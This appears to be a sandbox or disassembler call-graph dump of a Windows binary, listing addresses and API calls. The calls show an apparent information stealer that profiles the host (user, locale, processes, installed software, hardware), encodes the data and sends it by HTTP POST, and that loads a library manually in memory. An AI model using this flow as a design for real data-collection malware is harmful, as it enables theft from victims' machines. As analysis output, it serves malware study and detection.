96214 416da0 lstrcpy 96213->96214 96215 401525 96214->96215 96216 416da0 lstrcpy 96215->96216 96217 401537 96216->96217 96218 416da0 lstrcpy 96217->96218 96219 401549 96218->96219 96220 405610 96219->96220 96221 416da0 lstrcpy 96220->96221 96222 405629 96221->96222 96223 404470 3 API calls 96222->96223 96224 405635 96223->96224 96225 416d40 lstrcpy 96224->96225 96226 40566a 96225->96226 96227 416d40 lstrcpy 96226->96227 96228 405677 96227->96228 96229 416d40 lstrcpy 96228->96229 96230 405684 96229->96230 96231 416d40 lstrcpy 96230->96231 96232 405691 96231->96232 96233 416d40 lstrcpy 96232->96233 96234 40569e InternetOpenA StrCmpCA 96233->96234 96235 4056cd 96234->96235 96236 405c70 InternetCloseHandle 96235->96236 96238 415260 3 API calls 96235->96238 96237 405c8d 96236->96237 96240 4094a0 4 API calls 96237->96240 96239 4056ec 96238->96239 96241 416f20 3 API calls 96239->96241 96242 405c93 96240->96242 96243 4056ff 96241->96243 96245 416e20 2 API calls 96242->96245 96247 405ccc codecvt 96242->96247 96244 416ea0 lstrcpy 96243->96244 96250 405708 96244->96250 96246 405caa 96245->96246 96248 416fb0 4 API calls 96246->96248 96252 416da0 lstrcpy 96247->96252 96249 405cc0 96248->96249 96251 416ea0 lstrcpy 96249->96251 96253 416fb0 4 API calls 96250->96253 96251->96247 96261 405cfc 96252->96261 96254 405732 96253->96254 96255 416ea0 lstrcpy 96254->96255 96256 40573b 96255->96256 96257 416fb0 4 API calls 96256->96257 96258 40575a 96257->96258 96259 416ea0 lstrcpy 96258->96259 96260 405763 96259->96260 96262 416f20 3 API calls 96260->96262 96261->95252 96263 405781 96262->96263 96264 416ea0 lstrcpy 96263->96264 96265 40578a 96264->96265 96266 416fb0 4 API calls 96265->96266 96267 4057a9 96266->96267 96268 416ea0 lstrcpy 96267->96268 96269 4057b2 96268->96269 96270 416fb0 4 API calls 96269->96270 96271 4057d1 96270->96271 96272 416ea0 lstrcpy 96271->96272 96273 4057da 96272->96273 96274 416fb0 4 API calls 96273->96274 96275 405806 96274->96275 96276 416f20 3 API calls 96275->96276 96277 40580d 96276->96277 96278 416ea0 lstrcpy 96277->96278 96279 405816 96278->96279 96280 40582c InternetConnectA 96279->96280 96280->96236 96281 40585c HttpOpenRequestA 96280->96281 96283 405c63 InternetCloseHandle 96281->96283 96284 4058bb 96281->96284 96283->96236 96285 416fb0 4 API calls 96284->96285 96286 4058cf 96285->96286 96287 416ea0 lstrcpy 96286->96287 96288 4058d8 96287->96288 96289 416f20 3 API calls 96288->96289 96290 4058f6 96289->96290 96291 416ea0 lstrcpy 96290->96291 96292 4058ff 96291->96292 96293 416fb0 4 API calls 96292->96293 96294 40591e 96293->96294 96295 416ea0 lstrcpy 96294->96295 96296 405927 96295->96296 96297 416fb0 4 API calls 96296->96297 96298 405948 96297->96298 96299 416ea0 lstrcpy 96298->96299 96300 405951 96299->96300 96301 416fb0 4 API calls 96300->96301 96302 405971 96301->96302 96303 416ea0 lstrcpy 96302->96303 96304 40597a 96303->96304 96305 416fb0 4 API calls 96304->96305 96306 405999 96305->96306 96307 416ea0 lstrcpy 96306->96307 96308 4059a2 96307->96308 96309 416f20 3 API calls 96308->96309 96310 4059c0 96309->96310 96311 416ea0 lstrcpy 96310->96311 96312 4059c9 96311->96312 96313 416fb0 4 API calls 96312->96313 96314 4059e8 96313->96314 96315 416ea0 lstrcpy 96314->96315 96316 4059f1 96315->96316 96317 416fb0 4 API calls 96316->96317 96318 405a10 96317->96318 96319 416ea0 lstrcpy 96318->96319 96320 405a19 96319->96320 96321 416f20 3 API calls 96320->96321 96322 405a37 96321->96322 96323 416ea0 lstrcpy 96322->96323 96324 405a40 96323->96324 96325 416fb0 4 API calls 96324->96325 96326 405a5f 96325->96326 96327 416ea0 lstrcpy 96326->96327 96328 405a68 96327->96328 96329 416fb0 4 API calls 96328->96329 96330 405a89 96329->96330 96331 416ea0 lstrcpy 96330->96331 96332 405a92 96331->96332 96333 416fb0 4 API calls 96332->96333 96334 405ab2 96333->96334 96335 416ea0 lstrcpy 96334->96335 96336 405abb 96335->96336 96337 416fb0 4 API calls 96336->96337 96338 405ada 96337->96338 96339 416ea0 lstrcpy 96338->96339 96340 405ae3 96339->96340 96341 416f20 3 API calls 96340->96341 96342 405b01 96341->96342 96343 416ea0 lstrcpy 96342->96343 96344 405b0a 96343->96344 96345 405b1d lstrlen 96344->96345 97105 4170d0 96345->97105 96347 405b2e lstrlen GetProcessHeap HeapAlloc 97106 4170d0 96347->97106 96349 405b5b lstrlen 97107 4170d0 96349->97107 96351 405b6b memcpy 97108 4170d0 96351->97108 96353 405b84 lstrlen 96354 405b94 96353->96354 96355 405b9d lstrlen memcpy 96354->96355 97109 4170d0 96355->97109 96357 405bc7 lstrlen 97110 4170d0 96357->97110 96359 405bd7 HttpSendRequestA 96360 405be2 InternetReadFile 96359->96360 96361 405c17 InternetCloseHandle 96360->96361 96362 405c0e 96360->96362 96361->96283 96362->96360 96362->96361 96364 416fb0 4 API calls 96362->96364 96365 416ea0 lstrcpy 96362->96365 96364->96362 96365->96362 97111 4170d0 96366->97111 96368 40f3d7 strtok_s 96370 40f3e4 96368->96370 96369 40f4b1 96369->95254 96370->96369 96371 40f48d strtok_s 96370->96371 96372 416e20 lstrlen lstrcpy 96370->96372 96371->96370 96372->96370 97112 4170d0 96373->97112 96375 40f227 strtok_s 96381 40f234 96375->96381 96376 40f387 96376->95262 96377 40f363 strtok_s 96377->96381 96378 40f314 StrCmpCA 96378->96381 96379 40f297 StrCmpCA 96379->96381 96380 40f2d7 StrCmpCA 96380->96381 96381->96376 96381->96377 96381->96378 96381->96379 96381->96380 96382 416e20 lstrlen lstrcpy 96381->96382 96382->96381 96384 416d40 lstrcpy 96383->96384 96385 40fd26 96384->96385 96386 416fb0 4 API calls 96385->96386 96387 40fd37 96386->96387 96388 416ea0 lstrcpy 96387->96388 96389 40fd40 96388->96389 96390 416fb0 4 API calls 96389->96390 96391 40fd5b 96390->96391 96392 416ea0 lstrcpy 96391->96392 96393 40fd64 96392->96393 96394 416fb0 4 API calls 96393->96394 96395 40fd7d 96394->96395 96396 416ea0 lstrcpy 96395->96396 96397 40fd86 96396->96397 96398 416fb0 4 API calls 96397->96398 96399 40fda1 96398->96399 96400 416ea0 lstrcpy 96399->96400 96401 40fdaa 96400->96401 96402 416fb0 4 API calls 96401->96402 96403 40fdc3 96402->96403 96404 416ea0 lstrcpy 96403->96404 96405 40fdcc 96404->96405 96406 416fb0 4 API calls 96405->96406 96407 40fde7 96406->96407 96408 416ea0 lstrcpy 96407->96408 96409 40fdf0 96408->96409 96410 416fb0 4 API calls 96409->96410 96411 40fe09 96410->96411 96412 416ea0 lstrcpy 96411->96412 96413 40fe12 96412->96413 96414 416fb0 4 API calls 96413->96414 96415 40fe2d 96414->96415 96416 416ea0 lstrcpy 96415->96416 96417 40fe36 96416->96417 96418 416fb0 4 API calls 96417->96418 96419 40fe4f 96418->96419 96420 416ea0 lstrcpy 96419->96420 96421 40fe58 96420->96421 96422 416fb0 4 API calls 96421->96422 96423 40fe76 96422->96423 96424 416ea0 lstrcpy 96423->96424 96425 40fe7f 96424->96425 96426 4141c0 6 API calls 96425->96426 96427 40fe96 96426->96427 96428 416f20 3 API calls 96427->96428 96429 40fea9 96428->96429 96430 416ea0 lstrcpy 96429->96430 96431 40feb2 96430->96431 96432 416fb0 4 API calls 96431->96432 96433 40fedc 96432->96433 96434 416ea0 lstrcpy 96433->96434 96435 40fee5 96434->96435 96436 416fb0 4 API calls 96435->96436 96437 40ff05 96436->96437 96438 416ea0 lstrcpy 96437->96438 96439 40ff0e 96438->96439 97113 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 96439->97113 96441 40ff1e 96442 416fb0 4 API calls 96441->96442 96443 40ff2e 96442->96443 96444 416ea0 lstrcpy 96443->96444 96445 40ff37 96444->96445 96446 416fb0 4 API calls 96445->96446 96447 40ff56 96446->96447 96448 416ea0 lstrcpy 96447->96448 96449 40ff5f 96448->96449 96450 416fb0 4 API calls 96449->96450 96451 40ff80 96450->96451 96452 416ea0 lstrcpy 96451->96452 96453 40ff89 96452->96453 97116 414380 GetCurrentProcess IsWow64Process 96453->97116 96456 416fb0 4 API calls 96457 40ffa9 96456->96457 96458 416ea0 lstrcpy 96457->96458 96459 40ffb2 96458->96459 96460 416fb0 4 API calls 96459->96460 96461 40ffd1 96460->96461 96462 416ea0 lstrcpy 96461->96462 96463 40ffda 96462->96463 96464 416fb0 4 API calls 96463->96464 96465 40fffb 96464->96465 96466 416ea0 lstrcpy 96465->96466 96467 410004 96466->96467 97118 4143c0 GetProcessHeap HeapAlloc GetUserNameA 96467->97118 96469 410014 96470 416fb0 4 API calls 96469->96470 96471 410024 96470->96471 96472 416ea0 lstrcpy 96471->96472 96473 41002d 96472->96473 96474 416fb0 4 API calls 96473->96474 96475 41004c 96474->96475 96476 416ea0 lstrcpy 96475->96476 96477 410055 96476->96477 96478 416fb0 4 API calls 96477->96478 96479 410075 96478->96479 96480 416ea0 lstrcpy 96479->96480 96481 41007e 96480->96481 96482 414400 3 API calls 96481->96482 96483 41008e 96482->96483 96484 416fb0 4 API calls 96483->96484 96485 41009e 96484->96485 96486 416ea0 lstrcpy 96485->96486 96487 4100a7 96486->96487 96488 416fb0 4 API calls 96487->96488 96489 4100c6 96488->96489 96490 416ea0 lstrcpy 96489->96490 96491 4100cf 96490->96491 96492 416fb0 4 API calls 96491->96492 96493 4100f0 96492->96493 96494 416ea0 lstrcpy 96493->96494 96495 4100f9 96494->96495 97119 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 96495->97119 96497 410109 96498 416fb0 4 API calls 96497->96498 96499 410119 96498->96499 96500 416ea0 lstrcpy 96499->96500 96501 410122 96500->96501 96502 416fb0 4 API calls 96501->96502 96503 410141 96502->96503 96504 416ea0 lstrcpy 96503->96504 96505 41014a 96504->96505 96506 416fb0 4 API calls 96505->96506 96507 41016b 96506->96507 96508 416ea0 lstrcpy 96507->96508 96509 410174 96508->96509 97120 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 96509->97120 96512 416fb0 4 API calls 96513 410194 96512->96513 96514 416ea0 lstrcpy 96513->96514 96515 41019d 96514->96515 96516 416fb0 4 API calls 96515->96516 96517 4101bc 96516->96517 96518 416ea0 lstrcpy 96517->96518 96519 4101c5 96518->96519 96520 416fb0 4 API calls 96519->96520 96521 4101e5 96520->96521 96522 416ea0 lstrcpy 96521->96522 96523 4101ee 96522->96523 97123 414530 GetUserDefaultLocaleName 96523->97123 96526 416fb0 4 API calls 96527 41020e 96526->96527 96528 416ea0 lstrcpy 96527->96528 96529 410217 96528->96529 96530 416fb0 4 API calls 96529->96530 96531 410236 96530->96531 96532 416ea0 lstrcpy 96531->96532 96533 41023f 96532->96533 96534 416fb0 4 API calls 96533->96534 96535 410260 96534->96535 96536 416ea0 lstrcpy 96535->96536 96537 410269 96536->96537 97128 414570 96537->97128 96539 410280 96540 416f20 3 API calls 96539->96540 96541 410293 96540->96541 96542 416ea0 lstrcpy 96541->96542 96543 41029c 96542->96543 96544 416fb0 4 API calls 96543->96544 96545 4102c6 96544->96545 96546 416ea0 lstrcpy 96545->96546 96547 4102cf 96546->96547 96548 416fb0 4 API calls 96547->96548 96549 4102ef 96548->96549 96550 416ea0 lstrcpy 96549->96550 96551 4102f8 96550->96551 97140 414710 GetSystemPowerStatus 96551->97140 96554 416fb0 4 API calls 96555 410318 96554->96555 96556 416ea0 lstrcpy 96555->96556 96557 410321 96556->96557 96558 416fb0 4 API calls 96557->96558 96559 410340 96558->96559 96560 416ea0 lstrcpy 96559->96560 96561 410349 96560->96561 96562 416fb0 4 API calls 96561->96562 96563 41036a 96562->96563 96564 416ea0 lstrcpy 96563->96564 96565 410373 96564->96565 96566 41037e GetCurrentProcessId 96565->96566 97142 415b70 OpenProcess 96566->97142 96569 416f20 3 API calls 96570 4103a4 96569->96570 96571 416ea0 lstrcpy 96570->96571 96572 4103ad 96571->96572 96573 416fb0 4 API calls 96572->96573 96574 4103d7 96573->96574 96575 416ea0 lstrcpy 96574->96575 96576 4103e0 96575->96576 96577 416fb0 4 API calls 96576->96577 96578 410400 96577->96578 96579 416ea0 lstrcpy 96578->96579 96580 410409 96579->96580 97147 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 96580->97147 96582 410419 96583 416fb0 4 API calls 96582->96583 96584 410429 96583->96584 96585 416ea0 lstrcpy 96584->96585 96586 410432 96585->96586 96587 416fb0 4 API calls 96586->96587 96588 410451 96587->96588 96589 416ea0 lstrcpy 96588->96589 96590 41045a 96589->96590 96591 416fb0 4 API calls 96590->96591 96592 41047b 96591->96592 96593 416ea0 lstrcpy 96592->96593 96594 410484 96593->96594 97150 414800 96594->97150 96597 416fb0 4 API calls 96598 4104a4 96597->96598 96599 416ea0 lstrcpy 96598->96599 96600 4104ad 96599->96600 96601 416fb0 4 API calls 96600->96601 96602 4104cc 96601->96602 96603 416ea0 lstrcpy 96602->96603 96604 4104d5 96603->96604 96605 416fb0 4 API calls 96604->96605 96606 4104f6 96605->96606 96607 416ea0 lstrcpy 96606->96607 96608 4104ff 96607->96608 97165 4147c0 GetSystemInfo wsprintfA 96608->97165 96610 41050f 96611 416fb0 4 API calls 96610->96611 96612 41051f 96611->96612 96613 416ea0 lstrcpy 96612->96613 96614 410528 96613->96614 96615 416fb0 4 API calls 96614->96615 96616 410547 96615->96616 96617 416ea0 lstrcpy 96616->96617 96618 410550 96617->96618 96619 416fb0 4 API calls 96618->96619 96620 410570 96619->96620 96621 416ea0 lstrcpy 96620->96621 96622 410579 96621->96622 97166 414960 GetProcessHeap HeapAlloc 96622->97166 96624 410589 96625 416fb0 4 API calls 96624->96625 96626 410599 96625->96626 96627 416ea0 lstrcpy 96626->96627 96628 4105a2 96627->96628 96629 416fb0 4 API calls 96628->96629 96630 4105c1 96629->96630 96631 416ea0 lstrcpy 96630->96631 96632 4105ca 96631->96632 96633 416fb0 4 API calls 96632->96633 96634 4105eb 96633->96634 96635 416ea0 lstrcpy 96634->96635 96636 4105f4 96635->96636 97171 414ed0 96636->97171 96639 416f20 3 API calls 96640 41061e 96639->96640 96641 416ea0 lstrcpy 96640->96641 96642 410627 96641->96642 96643 416fb0 4 API calls 96642->96643 96644 410651 96643->96644 96645 416ea0 lstrcpy 96644->96645 96646 41065a 96645->96646 96647 416fb0 4 API calls 96646->96647 96648 41067a 96647->96648 96649 416ea0 lstrcpy 96648->96649 96650 410683 96649->96650 96651 416fb0 4 API calls 96650->96651 96652 4106a2 96651->96652 96653 416ea0 lstrcpy 96652->96653 96654 4106ab 96653->96654 97176 414a00 96654->97176 96656 4106c2 96657 416f20 3 API calls 96656->96657 96658 4106d5 96657->96658 96659 416ea0 lstrcpy 96658->96659 96660 4106de 96659->96660 96661 416fb0 4 API calls 96660->96661 96662 41070a 96661->96662 96663 416ea0 lstrcpy 96662->96663 96664 410713 96663->96664 96665 416fb0 4 API calls 96664->96665 96666 410732 96665->96666 96667 416ea0 lstrcpy 96666->96667 96668 41073b 96667->96668 96669 416fb0 4 API calls 96668->96669 96670 41075c 96669->96670 96671 416ea0 lstrcpy 96670->96671 96672 410765 96671->96672 96673 416fb0 4 API calls 96672->96673 96674 410784 96673->96674 96675 416ea0 lstrcpy 96674->96675 96676 41078d 96675->96676 96677 416fb0 4 API calls 96676->96677 96678 4107ae 96677->96678 96679 416ea0 lstrcpy 96678->96679 96680 4107b7 96679->96680 97184 414ae0 96680->97184 96682 4107d3 96683 416f20 3 API calls 96682->96683 96684 4107e6 96683->96684 96685 416ea0 lstrcpy 96684->96685 96686 4107ef 96685->96686 96687 416fb0 4 API calls 96686->96687 96688 410819 96687->96688 96689 416ea0 lstrcpy 96688->96689 96690 410822 96689->96690 96691 416fb0 4 API calls 96690->96691 96692 410843 96691->96692 96693 416ea0 lstrcpy 96692->96693 96694 41084c 96693->96694 96695 414ae0 17 API calls 96694->96695 96696 410868 96695->96696 96697 416f20 3 API calls 96696->96697 96698 41087b 96697->96698 96699 416ea0 lstrcpy 96698->96699 96700 410884 96699->96700 96701 416fb0 4 API calls 96700->96701 96702 4108ae 96701->96702 96703 416ea0 lstrcpy 96702->96703 96704 4108b7 96703->96704 96705 416fb0 4 API calls 96704->96705 96706 4108d6 96705->96706 96707 416ea0 lstrcpy 96706->96707 96708 4108df 96707->96708 96709 416fb0 4 API calls 96708->96709 96710 410900 96709->96710 96711 416ea0 lstrcpy 96710->96711 96712 410909 96711->96712 97220 414de0 96712->97220 96714 410920 96715 416f20 3 API calls 96714->96715 96716 410933 96715->96716 96717 416ea0 lstrcpy 96716->96717 96718 41093c 96717->96718 96719 41095a lstrlen 96718->96719 96720 41096a 96719->96720 96721 416d40 lstrcpy 96720->96721 96722 41097c 96721->96722 96723 401500 lstrcpy 96722->96723 96724 41098a 96723->96724 97230 404dc0 96724->97230 96726 410996 96726->95266 97410 4170d0 96727->97410 96729 404cc9 InternetOpenUrlA 96733 404ce1 96729->96733 96730 404cea InternetReadFile 96730->96733 96731 404d5c InternetCloseHandle InternetCloseHandle 96732 404da8 96731->96732 96732->95270 96733->96730 96733->96731 97411 4092b0 96734->97411 96736 40ef93 96737 40efb4 96736->96737 96738 40f1cf 96736->96738 96740 40efcd StrCmpCA 96737->96740 96739 401500 lstrcpy 96738->96739 96741 40f1dd 96739->96741 96742 40f04f 96740->96742 96743 40efd8 96740->96743 97575 40ea90 96741->97575 96747 40f06e StrCmpCA 96742->96747 96746 416da0 lstrcpy 96743->96746 96748 40eff0 96746->96748 96749 40f14e 96747->96749 96750 40f07d 96747->96750 96751 401500 lstrcpy 96748->96751 96754 40f17d StrCmpCA 96749->96754 96752 416d40 lstrcpy 96750->96752 96753 40f01e 96751->96753 96755 40f08a 96752->96755 96756 416da0 lstrcpy 96753->96756 96757 40f188 96754->96757 96758 40f1c7 96754->96758 96759 416fb0 4 API calls 96755->96759 96760 40f032 96756->96760 96761 401500 lstrcpy 96757->96761 96758->95274 96762 40f0b2 96759->96762 96763 416da0 lstrcpy 96760->96763 96764 40f196 96761->96764 96765 416f20 3 API calls 96762->96765 96766 40f04a 96763->96766 96767 416da0 lstrcpy 96764->96767 96768 40f0b9 96765->96768 96770 40f1aa 96767->96770 96771 416fb0 4 API calls 96768->96771 96772 416da0 lstrcpy 96770->96772 97069 404486 97068->97069 97100 414ff0 malloc 97069->97100 97071 4044af 97101 414ff0 malloc 97071->97101 97073 4044c5 97102 414ff0 malloc 97073->97102 97075 4044db 97076 4044f5 lstrlen 97075->97076 97103 4170d0 97076->97103 97078 404505 InternetCrackUrlA 97079 404524 97078->97079 97079->96052 97081 416d40 lstrcpy 97080->97081 97082 415274 97081->97082 97083 416d40 lstrcpy 97082->97083 97084 415282 GetSystemTime 97083->97084 97086 415299 97084->97086 97085 416da0 lstrcpy 97087 4152fc 97085->97087 97086->97085 97087->96067 97090 416f31 97088->97090 97089 416f88 97091 416da0 lstrcpy 97089->97091 97090->97089 97092 416f68 lstrcpy lstrcat 97090->97092 97093 416f94 97091->97093 97092->97089 97093->96070 97094->96185 97096 4094d9 LocalAlloc 97095->97096 97097 404bae 97095->97097 97096->97097 97098 4094f4 CryptStringToBinaryA 97096->97098 97097->96073 97097->96081 97098->97097 97099 409519 LocalFree 97098->97099 97099->97097 97100->97071 97101->97073 97102->97075 97103->97078 97104->96195 97105->96347 97106->96349 97107->96351 97108->96353 97109->96357 97110->96359 97111->96368 97112->96375 97114 414362 RegCloseKey 97113->97114 97115 414345 RegQueryValueExA 97113->97115 97114->96441 97115->97114 97117 40ff99 97116->97117 97117->96456 97118->96469 97119->96497 97121 4144f7 wsprintfA 97120->97121 97122 410184 97120->97122 97121->97122 97122->96512 97124 4101fe 97123->97124 97125 41455a 97123->97125 97124->96526 97392 415420 LocalAlloc CharToOemW 97125->97392 97127 414566 97127->97124 97129 416d40 lstrcpy 97128->97129 97130 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 97129->97130 97131 4145e2 97130->97131 97132 414603 GetLocaleInfoA 97131->97132 97133 4146d5 97131->97133 97137 416fb0 lstrcpy lstrlen lstrcpy lstrcat 97131->97137 97139 416ea0 lstrcpy 97131->97139 97132->97131 97134 4146e5 97133->97134 97135 4146db LocalFree 97133->97135 97136 416da0 lstrcpy 97134->97136 97135->97134 97138 4146f4 97136->97138 97137->97131 97138->96539 97139->97131 97141 410308 97140->97141 97141->96554 97143 415b93 K32GetModuleFileNameExA CloseHandle 97142->97143 97144 415bb5 97142->97144 97143->97144 97145 416d40 lstrcpy 97144->97145 97146 410391 97145->97146 97146->96569 97148 4147a2 RegCloseKey 97147->97148 97149 414785 RegQueryValueExA 97147->97149 97148->96582 97149->97148 97151 414836 GetLogicalProcessorInformationEx 97150->97151 97152 414855 GetLastError 97151->97152 97160 4148ab 97151->97160 97153 414860 97152->97153 97156 41489f 97152->97156 97164 414869 97153->97164 97157 410494 97156->97157 97396 4150f0 GetProcessHeap HeapFree 97156->97396 97157->96597 97395 4150f0 GetProcessHeap HeapFree 97160->97395 97161 4148fd 97161->97157 97163 414906 wsprintfA 97161->97163 97162 414893 97162->97157 97163->97157 97164->97151 97164->97162 97393 4150f0 GetProcessHeap HeapFree 97164->97393 97394 415110 GetProcessHeap HeapAlloc 97164->97394 97165->96610 97167 415090 97166->97167 97168 41498a GlobalMemoryStatusEx 97167->97168 97170 4149a0 __aulldiv 97168->97170 97169 4149d8 wsprintfA 97169->96624 97170->97169 97172 414ee8 GetProcessHeap HeapAlloc wsprintfA 97171->97172 97174 416d40 lstrcpy 97172->97174 97175 41060b 97174->97175 97175->96639 97177 416d40 lstrcpy 97176->97177 97183 414a16 97177->97183 97178 414a50 97180 416da0 lstrcpy 97178->97180 97179 416fb0 lstrcpy lstrlen lstrcpy lstrcat 97179->97183 97181 414ac9 97180->97181 97181->96656 97182 416ea0 lstrcpy 97182->97183 97183->97178 97183->97179 97183->97182 97185 416d40 lstrcpy 97184->97185 97186 414af9 RegOpenKeyExA 97185->97186 97187 414b4b 97186->97187 97188 414b6d 97186->97188 97189 416da0 lstrcpy 97187->97189 97190 414db0 RegCloseKey 97188->97190 97191 414b95 RegEnumKeyExA 97188->97191 97200 414b5a 97189->97200 97194 416da0 lstrcpy 97190->97194 97192 414dab 97191->97192 97193 414bdc wsprintfA RegOpenKeyExA 97191->97193 97192->97190 97195 414c22 RegCloseKey RegCloseKey 97193->97195 97196 414c5e RegQueryValueExA 97193->97196 97194->97200 97197 416da0 lstrcpy 97195->97197 97198 414c97 lstrlen 97196->97198 97199 414d9e RegCloseKey 97196->97199 97197->97200 97198->97199 97201 414cad 97198->97201 97199->97192 97200->96682 97202 416fb0 4 API calls 97201->97202 97203 414cc4 97202->97203 97204 416ea0 lstrcpy 97203->97204 97205 414cd0 97204->97205 97206 416fb0 4 API calls 97205->97206 97207 414cf4 97206->97207 97208 416ea0 lstrcpy 97207->97208 97209 414d00 97208->97209 97210 414d0b RegQueryValueExA 97209->97210 97210->97199 97211 414d40 97210->97211 97212 416fb0 4 API calls 97211->97212 97213 414d57 97212->97213 97214 416ea0 lstrcpy 97213->97214 97215 414d63 97214->97215 97216 416fb0 4 API calls 97215->97216 97217 414d87 97216->97217 97218 416ea0 lstrcpy 97217->97218 97219 414d93 97218->97219 97219->97199 97221 416d40 lstrcpy 97220->97221 97222 414df9 CreateToolhelp32Snapshot Process32First 97221->97222 97223 414e25 Process32Next 97222->97223 97224 414e9a FindCloseChangeNotification 97222->97224 97223->97224 97229 414e3a 97223->97229 97225 416da0 lstrcpy 97224->97225 97226 414eb3 97225->97226 97226->96714 97227 416ea0 lstrcpy 97227->97229 97228 416fb0 lstrcpy lstrlen lstrcpy lstrcat 97228->97229 97229->97223 97229->97227 97229->97228 97231 416da0 lstrcpy 97230->97231 97232 404dd9 97231->97232 97233 404470 3 API calls 97232->97233 97234 404de5 97233->97234 97397 4155a0 97234->97397 97236 404e3e 97237 404e49 lstrlen 97236->97237 97238 404e59 97237->97238 97239 4155a0 4 API calls 97238->97239 97240 404e6a 97239->97240 97241 416d40 lstrcpy 97240->97241 97242 404e7d 97241->97242 97243 416d40 lstrcpy 97242->97243 97244 404e8a 97243->97244 97245 416d40 lstrcpy 97244->97245 97246 404e97 97245->97246 97247 416d40 lstrcpy 97246->97247 97248 404ea4 97247->97248 97249 416d40 lstrcpy 97248->97249 97250 404eb1 InternetOpenA StrCmpCA 97249->97250 97251 404ee3 97250->97251 97252 405578 InternetCloseHandle 97251->97252 97253 415260 3 API calls 97251->97253 97259 40558d codecvt 97252->97259 97254 404f02 97253->97254 97255 416f20 3 API calls 97254->97255 97256 404f15 97255->97256 97257 416ea0 lstrcpy 97256->97257 97258 404f1e 97257->97258 97260 416fb0 4 API calls 97258->97260 97262 416da0 lstrcpy 97259->97262 97261 404f5f 97260->97261 97263 416f20 3 API calls 97261->97263 97270 4055c7 97262->97270 97264 404f66 97263->97264 97265 416fb0 4 API calls 97264->97265 97266 404f6d 97265->97266 97267 416ea0 lstrcpy 97266->97267 97268 404f76 97267->97268 97269 416fb0 4 API calls 97268->97269 97271 404fb7 97269->97271 97270->96726 97272 416f20 3 API calls 97271->97272 97273 404fbe 97272->97273 97274 416ea0 lstrcpy 97273->97274 97275 404fc7 97274->97275 97276 404fdd InternetConnectA 97275->97276 97276->97252 97277 40500d HttpOpenRequestA 97276->97277 97279 40556b InternetCloseHandle 97277->97279 97280 40506b 97277->97280 97279->97252 97281 416fb0 4 API calls 97280->97281 97282 40507f 97281->97282 97283 416ea0 lstrcpy 97282->97283 97284 405088 97283->97284 97285 416f20 3 API calls 97284->97285 97286 4050a6 97285->97286 97287 416ea0 lstrcpy 97286->97287 97288 4050af 97287->97288 97289 416fb0 4 API calls 97288->97289 97290 4050ce 97289->97290 97291 416ea0 lstrcpy 97290->97291 97292 4050d7 97291->97292 97293 416fb0 4 API calls 97292->97293 97294 4050f8 97293->97294 97295 416ea0 lstrcpy 97294->97295 97296 405101 97295->97296 97297 416fb0 4 API calls 97296->97297 97392->97127 97393->97164 97394->97164 97395->97161 97396->97157 97398 4155ad CryptBinaryToStringA 97397->97398 97402 4155a9 97397->97402 97399 4155ce GetProcessHeap RtlAllocateHeap 97398->97399 97398->97402 97400 4155f4 codecvt 97399->97400 97399->97402 97401 415605 CryptBinaryToStringA 97400->97401 97401->97402 97402->97236 97410->96729 97650 409260 97411->97650 97413 4092c1 97413->96736 97576 416d40 lstrcpy 97575->97576 97577 40eaa6 97576->97577 97578 4154e0 2 API calls 97577->97578 97579 40eabb 97578->97579 97580 416f20 3 API calls 97579->97580 97581 40eacb 97580->97581 97582 416ea0 lstrcpy 97581->97582 97655 414ff0 malloc 97650->97655 97652 40926d 97656 406990 97652->97656 97654 40928c codecvt 97654->97413 97655->97652 97659 406730 97656->97659 97660 406753 97659->97660 97675 406749 97659->97675 97677 405f20 97660->97677 97664 4067ae 97664->97675 97689 4063a0 97664->97689 97668 40683a 97669 4068d6 VirtualFree 97668->97669 97671 4068e7 97668->97671 97668->97675 97669->97671 97670 406931 97670->97675 97671->97670 97673 406916 FreeLibrary 97671->97673 97673->97671 97675->97654 97679 405f32 97677->97679 97678 405f39 97678->97675 97683 406050 97678->97683 97679->97678 97680 405fbe 97679->97680 97706 415110 GetProcessHeap HeapAlloc 97680->97706 97682 405fe0 97682->97678 97684 40607f VirtualAlloc 97683->97684 97686 406120 97684->97686 97687 40612c 97684->97687 97686->97687 97688 406133 VirtualAlloc 97686->97688 97687->97664 97688->97687 97690 4063c5 97689->97690 97691 4063b9 97689->97691 97690->97675 97700 4065d0 97690->97700 97691->97690 97692 4063f9 LoadLibraryA 97691->97692 97693 406418 97692->97693 97694 406422 97692->97694 97693->97690 97697 4064cc 97694->97697 97707 415110 GetProcessHeap HeapAlloc 97694->97707 97696 406594 GetProcAddress 97696->97693 97696->97697 97697->97693 97697->97696 97699 40647b 97699->97693 97708 4150f0 GetProcessHeap HeapFree 97699->97708 97702 4065eb 97700->97702 97701 406670 VirtualProtect 97701->97702 97703 406699 97701->97703 97702->97701 97702->97703 97703->97668 97706->97682 97707->97699 97708->97697 98807 6c03b830 98808 6c03b83b 98807->98808 98809 6c03b86e dllmain_crt_process_detach 98807->98809 98810 6c03b860 dllmain_crt_process_attach 98808->98810 98811 6c03b840 98808->98811 98809->98811 98810->98811 98812 6c03b9c0 98813 6c03b9c9 98812->98813 98814 6c03b9ce dllmain_dispatch 98812->98814 98816 6c03bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 98813->98816 98816->98814 98817 6c03b694 98818 6c03b6a0 ___scrt_is_nonwritable_in_current_image 98817->98818 98847 6c03af2a 98818->98847 98820 6c03b6a7 98821 6c03b6d1 98820->98821 98822 6c03b796 98820->98822 98825 6c03b6ac ___scrt_is_nonwritable_in_current_image 98820->98825 98851 6c03b064 98821->98851 98864 6c03b1f7 IsProcessorFeaturePresent 98822->98864 98826 6c03b6e0 __RTC_Initialize 98826->98825 98854 6c03bf89 InitializeSListHead 98826->98854 98828 6c03b6ee ___scrt_initialize_default_local_stdio_options 98830 6c03b6f3 _initterm_e 98828->98830 98829 6c03b79d ___scrt_is_nonwritable_in_current_image 98831 6c03b7d2 98829->98831 98832 6c03b828 98829->98832 98846 6c03b7b3 ___scrt_uninitialize_crt __RTC_Initialize 98829->98846 98830->98825 98833 6c03b708 98830->98833 98868 6c03b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 98831->98868 98834 6c03b1f7 ___scrt_fastfail 6 API calls 98832->98834 98855 6c03b072 98833->98855 98836 6c03b82f 98834->98836 98841 6c03b83b 98836->98841 